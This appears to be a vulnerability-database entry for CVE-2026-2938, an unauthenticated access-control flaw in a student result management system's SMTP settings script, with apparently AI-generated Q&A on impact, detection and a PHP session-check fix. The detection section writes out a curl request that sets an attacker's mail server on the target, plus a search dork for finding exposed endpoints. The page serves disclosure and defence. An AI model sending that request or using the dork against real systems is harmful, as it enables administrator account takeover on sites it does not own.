CVE-2026-2938
Improper Access Control in SourceCodester SRMS Allows Remote Exploit
Publication date: 2026-02-22
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| munyweki | student_result_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
Can you explain this vulnerability to me?
CVE-2026-2938 is a critical improper access control vulnerability in SourceCodester Student Result Management System 1.0, specifically in the administrative core script update_smtp.php. The vulnerability arises because the script does not perform any authentication or authorization checks before processing POST requests that update SMTP mail server settings.
This lack of access control allows unauthenticated remote attackers to send crafted requests to overwrite SMTP configuration parameters such as mail server, username, password, port, and security settings.
As a result, attackers can hijack the SMTP settings to redirect system emails, including password reset tokens, to a malicious server they control. This enables them to perform a full account takeover of the Super Administrator account.
Additionally, related vulnerabilities in the system allow unauthenticated attackers to inject bulk accounts and delete existing accounts, further compromising system integrity.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized full account takeover of the Super Administrator account by hijacking SMTP settings.
- Attackers can redirect password reset emails and other sensitive communications to their own servers.
- They can create arbitrary privileged accounts via unauthenticated bulk account injection.
- Attackers can delete critical user accounts, including administrators, causing denial of service.
Overall, the vulnerability allows remote unauthenticated attackers to fully compromise the confidentiality, integrity, and availability of the affected system.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if the administrative scripts, especially `/srms/script/admin/core/update_smtp.php`, accept unauthenticated POST requests that modify SMTP settings without proper session or privilege validation.'}, {'type': 'paragraph', 'content': 'One detection method is to attempt sending a crafted POST request to the vulnerable endpoint to see if SMTP settings can be changed without authentication.'}, {'type': 'paragraph', 'content': 'Additionally, network detection can involve searching for HTTP requests targeting the vulnerable script, for example by monitoring logs or using tools to detect POST requests to `/srms/script/admin/core/update_smtp.php` from unauthorized sources.'}, {'type': 'list_item', 'content': 'Use curl to test unauthorized POST request to update SMTP settings: curl -X POST -d "mail_server=smtp.attacker.com&mail_username=attacker&mail_password=pass&mail_port=25&mail_security=none" http://target/srms/script/admin/core/update_smtp.php'}, {'type': 'list_item', 'content': 'Search web server logs for POST requests to `/srms/script/admin/core/update_smtp.php` without valid session cookies.'}, {'type': 'list_item', 'content': 'Use Google dorking to identify exposed vulnerable endpoints: inurl:srms/script/admin/core/update_smtp.php'}] [1, 2, 3]
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'Immediate mitigation requires implementing strict session-based access control checks in all affected scripts, especially in `/srms/script/admin/core/update_smtp.php`, `/srms/script/admin/core/import_users.php`, and `/srms/script/admin/core/drop_user.php`.'}, {'type': 'paragraph', 'content': 'Specifically, the scripts should verify that a session exists and that the user has administrator privileges (level 0) before processing any requests.'}, {'type': 'paragraph', 'content': 'If the checks fail, the script should log the unauthorized access attempt and redirect the user to the login page to prevent unauthorized actions.'}, {'type': 'list_item', 'content': 'Add at the start of each vulnerable script: \n```php\nsession_start();\nif (!isset($_SESSION[\'level\']) || $_SESSION[\'level\'] != \'0\') {\n error_log("Unauthorized access attempt from " . $_SERVER[\'REMOTE_ADDR\']);\n header("location: ../../");\n exit();\n}\n```'}, {'type': 'paragraph', 'content': 'Additionally, review and patch all administrative scripts to ensure proper authentication and authorization checks are in place before processing sensitive operations.'}, {'type': 'paragraph', 'content': 'If possible, restrict access to these administrative endpoints via network controls or firewall rules until patches are applied.'}] [1]